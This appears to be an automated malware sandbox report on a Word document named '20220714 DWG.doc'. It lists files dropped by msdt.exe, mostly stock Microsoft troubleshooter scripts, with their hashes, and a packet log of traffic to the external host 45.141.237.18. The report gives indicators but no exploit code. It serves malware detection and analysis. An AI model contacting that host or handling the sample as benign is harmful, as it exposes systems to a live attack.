                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                            File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                            Entropy (8bit):7.965614028395722
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                            File name:20220714 DWG.doc
                                                                                                                                                                            File size:952586
                                                                                                                                                                            MD5:5fd0deaaca6ac9645ba3e9aa8af3311c
                                                                                                                                                                            SHA1:4823c45cde3606a5189462a8c4441686706d04f3
                                                                                                                                                                            SHA256:b78c36823ab0b86b683d165e53405855b8e910c5011997e5a4a4620200cffc0a
                                                                                                                                                                            SHA512:f437de0000c2b6aa2c42c9d750b723385da1bf0bce22f2008116392a12a7d168cc8bdf5065fd232889087512ef321a20578e5c4fdb24cd08a5ebf33d31167e1d
                                                                                                                                                                            SSDEEP:24576:i1yg5B+jHQ89ihbudaSMcKdth3ut3w7mM4nnl:iJzQQ8U4fwdqtb3l
                                                                                                                                                                            TLSH:D51512C5B9A69E8AC3D297318F7DD8005F3BB5734188142EF5C2E65834C7AD6CA53B22
                                                                                                                                                                            File Content Preview:PK........o..T................[Content_Types].xml<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.openxmlformats-offi
                                                                                                                                                                            Icon Hash:74f4c4c6c1cac4d8
                                                                                                                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Jul 15, 2022 15:28:25.511867046 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511881113 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511897087 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511900902 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511914968 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511933088 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511941910 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511949062 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511977911 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512011051 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512028933 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512048960 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512073994 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512079000 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512095928 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512110949 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512125015 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512142897 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512142897 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512161970 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512176991 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512187958 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512206078 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512212038 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512232065 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512249947 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512265921 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512283087 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512295008 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512322903 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512347937 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512351990 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512370110 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512372971 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512412071 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512464046 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512465954 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512526035 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512533903 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512552023 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512567997 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512609959 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.513432980 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.513453007 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.513525963 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539670944 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539702892 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539721966 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539738894 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539740086 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539758921 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539767981 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539777040 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539793015 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539809942 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539820910 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539825916 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539843082 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539844036 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539861917 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539869070 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539879084 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539896965 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539906025 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539913893 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539933920 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539942026 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539949894 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539968014 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539969921 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539988995 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540007114 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540015936 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540024996 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540043116 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540076017 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540093899 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540112972 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540139914 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540148973 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540175915 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540180922 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540198088 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540215969 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540225029 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540232897 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540251017 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540263891 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540288925 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540292978 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540308952 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540338039 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540354967 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540354967 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540385962 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540404081 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540421009 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540421963 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540450096 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540458918 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540467978 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540493965 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540519953 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540535927 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540575981 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540579081 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540597916 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540616035 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540622950 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540633917 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540651083 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540668011 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540677071 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540719032 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.541029930 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.541062117 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625555038 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625571012 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625587940 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625597000 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625602007 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625622034 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625622034 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625641108 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625657082 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625674009 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625694036 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625726938 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625757933 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625771046 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625788927 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625808001 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625825882 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625840902 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625844002 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625861883 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625880003 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625880003 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625896931 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625910044 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625921965 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625926971 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625945091 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625958920 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625961065 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625981092 CEST804976645.141.237.18192.168.2.3
